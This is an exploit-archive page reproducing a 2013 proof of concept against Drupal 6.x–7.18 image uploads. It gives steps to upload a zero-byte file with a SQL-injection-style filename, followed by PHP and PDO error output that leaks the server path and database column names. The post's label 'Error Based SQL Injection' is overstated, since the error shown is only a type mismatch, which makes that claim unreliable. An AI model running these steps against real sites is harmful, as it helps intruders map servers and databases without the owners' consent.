exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Drupal 6.x / 7.18 Information Disclosure

Drupal 6.x / 7.18 Information Disclosure
Posted Jan 2, 2013
Authored by KedAns-Dz

Drupal versions 6.x through 7.18 suffer from getimagesize() path and information disclosure vulnerabilities.

tags | exploit, vulnerability, info disclosure
SHA-256 | 34d3057e774046cc520c1382be17b13f86fced4961308ef915eed34cc0f4d906

Drupal 6.x / 7.18 Information Disclosure

Change Mirror Download
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm KedAns-Dz member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

###
# Title : Drupal 6.x->7.18 getimagesize() <= Multiple Vulnerabilities
# Author : KedAns-Dz
# E-mail : ked-h (@hotmail.com / @1337day.com)
# Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)
# Web Site : www.1337day.com .net .org
# FaCeb0ok : http://fb.me/Inj3ct0rK3d
# TwiTter : @kedans
# Friendly Sites : www.r00tw0rm.com * www.exploit-id.com
# Platform/CatID : php - remote - Multiple
# Type : php - proof of concept - webapp 0day
# Tested on : Windows7
###

# <3 <3 Greetings t0 Palestine <3 <3
# F-ck HaCking, Lov3 Explo8ting !

### [ Proof Images ] ####
#
# [1]> http://i45.tinypic.com/2a7tloz.jpg
#
# [2]> http://i50.tinypic.com/2repeyt.jpg
#
#########################

######## [ Proof / Exploit ] ################|=>

##################
# [!] Description:
------------------
This Bug in fonction ' getimagesize() ' is Multiple Vulnerabilities (in Drupal CMS),
When you Upload NULL Image-Size the Script Can't Read the Image Content and show you
some errors, The Attacker can use this bug to get some important information like SQL Info's
or Disclosure the Full Path of drupal.

############################
# [1] Full Path Disclosure :
----------------------------
+> Go to add new Content/Article :
ex : [ http://127.0.0.1/drupal-7.18/node/4#overlay=node/add/article ]
and upload some NULL image (0 bytes), exn: [ UNION+SELECT+database()#.gif ] (with null content/bytes ok!)
and Push UPLOAD ... you get error MSG like this ==>
_________________________________________
Notice: getimagesize(): Read error! in image_gd_get_info()
(line 349 of C:\Program Files\EasyPHP-12.1\www\drupal-7.18\modules\system\image.gd.inc).
Notice: getimagesize(): Read error! in image_gd_get_info()
(line 349 of C:\Program Files\EasyPHP-12.1\www\drupal-7.18\modules\system\image.gd.inc).
_________________________________________

=> in this error msg you can see/disclosure the Full Path ^_^ !, ( see the proof image )

#################################
# [2] Error Based SQL Injection :
---------------------------------
+> The Same steps in the POC [1] , but just POST/Save the Content/Article
and get this SQL Error MSG (ex:) =>
__________________________________________________________
Notice: getimagesize(): Read error! in image_gd_get_info() (line 349 of C:\Program Files\EasyPHP-12.1\www\drupal-7.18\modules\system\image.gd.inc).
PDOException: SQLSTATE[HY000]: General error: 1366 Incorrect integer value: '' for column 'field_image_width' at row 1: INSERT INTO {field_data_field_image}
(entity_type, entity_id, revision_id, bundle, delta, language, field_image_fid, field_image_alt, field_image_title, field_image_width, field_image_height)
VALUES (:db_insert_placeholder_0, :db_insert_placeholder_1, :db_insert_placeholder_2, :db_insert_placeholder_3, :db_insert_placeholder_4, :db_insert_placeholder_5,
:db_insert_placeholder_6, :db_insert_placeholder_7, :db_insert_placeholder_8, :db_insert_placeholder_9, :db_insert_placeholder_10);
Array ( [:db_insert_placeholder_0] => node [:db_insert_placeholder_1] => 7 [:db_insert_placeholder_2] => 7 [:db_insert_placeholder_3] =>
article [:db_insert_placeholder_4] => 0 [:db_insert_placeholder_5] => und [:db_insert_placeholder_6] => 5 [:db_insert_placeholder_7] => [:db_insert_placeholder_8]
=> [:db_insert_placeholder_9] => [:db_insert_placeholder_10] => ) in field_sql_storage_field_storage_write()
(line 448 of C:\Program Files\EasyPHP-12.1\www\drupal-7.18\modules\field\modules\field_sql_storage\field_sql_storage.module).
___________________________________________________________

=> you can see in this msg some SQL informations like (some columns name/content ) etc...

#####
# Happy neW Year 'All Elite Pene-Testers in ( 1337day & PacketStorm ) ^_^ Good Luck in 2013 <3
#####

#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]===============================================
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > | Indoushka , Caddy-Dz , Kalashinkov3 , Mennouchi.Islem
# Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz, KinG Of PiraTeS, TrOoN, T0xic, Chevr0sky, Black-ID, Barbaros-DZ,
# +> Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (1337day.com) * CrosS (r00tw0rm.com)
# Inj3ct0r Members 31337 : KedAns ^^ * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * Angel Injection
# NuxbieCyber (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * xDZx * HD Moore * YMCMB ..all
# Exploit-ID Team : jos_ali_joe + kaMtiEz + r3m1ck (exploit-id.com) * Milw0rm * KeyStr0ke * JF * L3b-r1Z * HMD
# packetstormsecurity.org * metasploit.com * r00tw0rm.com * OWASP Dz * B.N.T * All Security and Exploits Webs
#============================================================================================================
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close